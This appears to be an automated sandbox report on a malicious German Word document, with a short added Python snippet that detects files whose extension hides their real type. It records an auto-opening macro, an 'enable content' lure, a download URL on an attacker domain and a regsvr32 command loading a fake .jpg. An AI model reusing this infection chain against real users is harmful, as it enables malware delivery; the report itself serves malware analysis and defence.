Analysis Report Datei-04.28.2021.doc

Overview

General Information

Sample Name:Datei-04.28.2021.doc
Analysis ID:399362
MD5:6747583727ce069aa8ae9d398d35e5bc
SHA1:97667bf552bf5557666b5266003b0411bc1669bc
SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA with base64 encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • WINWORD.EXE (PID: 1692 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • regsvr32.exe (PID: 2544 cmdline: regsvr32 c:\programdata\argumentSelectTmp.jpg MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Register DLL with spoofed extension
Source: Process started | Author: Joe Security | Data: Command: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1692, ProcessCommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, ProcessId: 2544

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Datei-04.28.2021.doc | Virustotal: Detection: 12%
Machine Learning detection for sample
Source: Datei-04.28.2021.doc | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | DNS query: name: better-transport-2008.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 45.142.215.160:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 45.142.215.160:80
Source: global traffic | HTTP traffic detected:
    GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: better-transport-2008.com
    Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555D4EB4-8E09-401E-A760-1A1C7B299BE3}.tmp
Source: global traffic | HTTP traffic detected:
    GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: better-transport-2008.com
    Connection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: better-transport-2008.com
Source: vbaProject.bin | String found in binary or memory: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.2092988316.0000000001CF0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 | Screenshot OCR: Inhalt aktivieren". a S nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8 | Screenshot OCR: Bearbeitung aktivieren' in der oberen Leiste und dann auf ,,Inhalt aktivieren". a S nmmm O
Source: Document image extraction number: 0 | Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 0 | Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Source: Document image extraction number: 1 | Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 1 | Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation | OLE, VBA macro: Module optionRemoveGeneric, Function memoryIndex, String ThisDocument
Source: Datei-04.28.2021.doc | OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation | OLE, VBA macro: Module listCopy, Function autoopen, Name: autoopen
Source: Datei-04.28.2021.doc | OLE indicator, VBA macros: true
Source: Datei-04.28.2021.doc | OLE indicator has summary info: false
Source: Datei-04.28.2021.doc | OLE indicator application name: unknown
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal76.expl.winDOC@4/12@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$tei-04.28.2021.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRB23E.tmp
Source: Datei-04.28.2021.doc | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Datei-04.28.2021.doc | Virustotal: Detection: 12%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.2.dr | Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 2844 | Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Scripting 12, Exploitation for Client Execution 13, At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection 1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading 1, Disable or Modify Tools 1, Virtualization/Sandbox Evasion 1, Process Injection 1, Scripting 12
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Virtualization/Sandbox Evasion 1, File and Directory Discovery 1, System Information Discovery 2, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol 2, Application Layer Protocol 12, Ingress Tool Transfer 2, Protocol Impersonation, Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

Behavior Graph

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Datei-04.28.2021.doc | 13% | Virustotal |
Datei-04.28.2021.doc | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
better-transport-2008.com | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4 | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs | 1% | Virustotal |
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
better-transport-2008.com | 45.142.215.160 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs | false | 1% Virustotal; Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | false | | high
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4 | vbaProject.bin | false | Avira URL Cloud: safe | unknown
http://www.%s.comPA | regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmp | false | | high
http://servername/isapibackend.dll | regsvr32.exe, 00000004.00000002.2092988316.0000000001CF0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.142.215.160 | better-transport-2008.com | Russian Federation | 202933 | CLOUDSOLUTIONSRU | false

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:399362
                Start date:28.04.2021
                Start time:17:46:43
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 21s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Datei-04.28.2021.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.winDOC@4/12@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
17:47:43 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
CLOUDSOLUTIONSRU | richiedere-04.26.21.doc (listed 3 times) | malicious | 45.142.215.164
CLOUDSOLUTIONSRU | verschreiben.04.26.2021.doc (listed 3 times) | malicious | 45.142.215.163
CLOUDSOLUTIONSRU | 3IsEcDekqj.exe | malicious | 45.142.215.63
CLOUDSOLUTIONSRU | Handel-04.20.2021.doc (listed 2 times) | malicious | 45.142.215.16
CLOUDSOLUTIONSRU | der Vorschlag.04.21.doc (listed 3 times) | malicious | 45.142.215.16
CLOUDSOLUTIONSRU | zu erzaehlen.doc (listed 3 times) | malicious | 45.142.215.32
CLOUDSOLUTIONSRU | verschreiben 04.16.2021.doc (listed 3 times) | malicious | 45.142.215.32
CLOUDSOLUTIONSRU | zu fordern.04.21.doc (listed 2 times) | malicious | 45.142.213.182

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\argumentSelectTmp.jpg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text
                Category:dropped
                Size (bytes):204
                Entropy (8bit):5.134216527532146
                Encrypted:false
                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                MD5:FEDDB78986726A4A2161D362A5D52F25
                SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                Malicious:false
                Reputation:low
                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
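The file above is worth a second look: it is named argumentSelectTmp.jpg but its 204 bytes are the HTTP server's HTML "404 Not Found" page for the path laka4, so the download the macro attempted did not return a payload. The extension is a disguise in either case, since a .jpg name is only there to look harmless on disk; regsvr32 (which shows up later in this report as a running process) can only register a PE image, so a non-PE file fails at LoadLibrary whatever it is called. The following Python is an example added to this report, not Joe Sandbox code and not part of the sample: it sniffs the leading bytes of a dropped file and reports when they disagree with the extension. The type table and the helper names (sniff, mismatch, regsvr32_loadable) are this example's own, and the sample bytes are reconstructed from the Preview shown above.

```python
"""Check whether a dropped file's extension matches its real content.

Added example for this report, not part of Joe Sandbox or of the analysed
sample. The dropped file argumentSelectTmp.jpg above is a 204-byte HTML
"404 Not Found" page under an image extension; this sniffer flags exactly
that kind of mismatch. DROPPED_404 is reconstructed from the report's Preview.
"""
from __future__ import annotations

import os

# Magic-byte prefixes for the few types that matter in this infection chain.
# A real triage tool would use libmagic; this table is deliberately minimal.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"MZ": "pe",            # DLL/EXE: the only thing regsvr32 can load
    b"PK\x03\x04": "zip",   # docx/docm containers are zip archives
    b"%PDF": "pdf",
}

# What content each extension is allowed to carry.
EXTENSION_TYPES = {
    ".jpg": {"jpeg"}, ".jpeg": {"jpeg"},
    ".dll": {"pe"}, ".ocx": {"pe"}, ".exe": {"pe"},
    ".docx": {"zip"}, ".docm": {"zip"}, ".doc": {"zip", "ole"},
    ".pdf": {"pdf"},
}


def sniff(data: bytes) -> str:
    """Return a coarse type label derived from the leading bytes."""
    for prefix, label in MAGIC.items():
        if data.startswith(prefix):
            return label
    if data.startswith(b"\xd0\xcf\x11\xe0"):   # OLE2 compound file (legacy .doc)
        return "ole"
    head = data.lstrip()[:64].lower()
    if head.startswith((b"<!doctype html", b"<html", b"<head")):
        return "html"
    return "unknown"


def mismatch(path: str, data: bytes) -> str | None:
    """One-line finding when the extension lies about the content, else None."""
    ext = os.path.splitext(path)[1].lower()
    expected = EXTENSION_TYPES.get(ext)
    if expected is None:
        return None               # extension we make no claim about
    actual = sniff(data)
    if actual in expected:
        return None
    return f"{path}: extension {ext} but content is {actual}"


def regsvr32_loadable(data: bytes) -> bool:
    """regsvr32 calls LoadLibrary; anything that is not a PE image fails there."""
    return sniff(data) == "pe"


# Constructed from the Preview of C:\ProgramData\argumentSelectTmp.jpg above.
DROPPED_404 = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
    b'<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n'
    b'<p>The requested URL "laka4" was not found on this server.</p>\n'
    b'</body></html>\n'
)

if __name__ == "__main__":
    print(mismatch(r"C:\ProgramData\argumentSelectTmp.jpg", DROPPED_404))
    print("regsvr32 could load it:", regsvr32_loadable(DROPPED_404))
```

Run against the two cached copies listed in this section (the ProgramData file and the Content.IE5 copy) the check reports the same html-under-.jpg mismatch for both, which is the detail an analyst wants when deciding whether a stage-two payload ever landed.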
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\laka4[1].htm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text
                Category:downloaded
                Size (bytes):204
                Entropy (8bit):5.134216527532146
                Encrypted:false
                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                MD5:FEDDB78986726A4A2161D362A5D52F25
                SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                Malicious:false
                Reputation:low
                IE Cache URL:http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs
                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92D29733.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:[TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
                Category:dropped
                Size (bytes):79188
                Entropy (8bit):7.847381222647767
                Encrypted:false
                SSDEEP:1536:3hdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6eh:MlZAPY2yWwb3ZadaxHeuNQpeh
                MD5:A1BAC07A20C5DF390D6D96B0FB713F5D
                SHA1:427F044786B5C412EF3B424CDA2DEA817AA9CCA6
                SHA-256:0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
                SHA-512:1EBB00551E59417AA5CC16D195E27EE227342108C4C093D9A747241BAC6AC54A48262686AD3911DFDCF89AA1EA3E2A1C91CAE790252A5C2C81978F362CCA2BA1
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .....xExif..II*...........................v...................................................................................................(...........1...........2...........i...........0................'.......'..Adobe Photoshop 22.2 (Windows).2021:04:08 01:34:08..........................<...........................................~...............(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................$...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......S.,.2....}....sC.:.....k..}OS.6~..?Yz.......}M...|....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Microsoft Word 2007+
                Category:dropped
                Size (bytes):20515
                Entropy (8bit):7.469835486287775
                Encrypted:false
                SSDEEP:384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
                MD5:747F920591F171BA793209DB3BFD8A21
                SHA1:BCF601F9500A6B5C20DB101840F4288D685FC57D
                SHA-256:74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
                SHA-512:0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47F385A6-6281-436E-ACD1-2266A057AE87}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
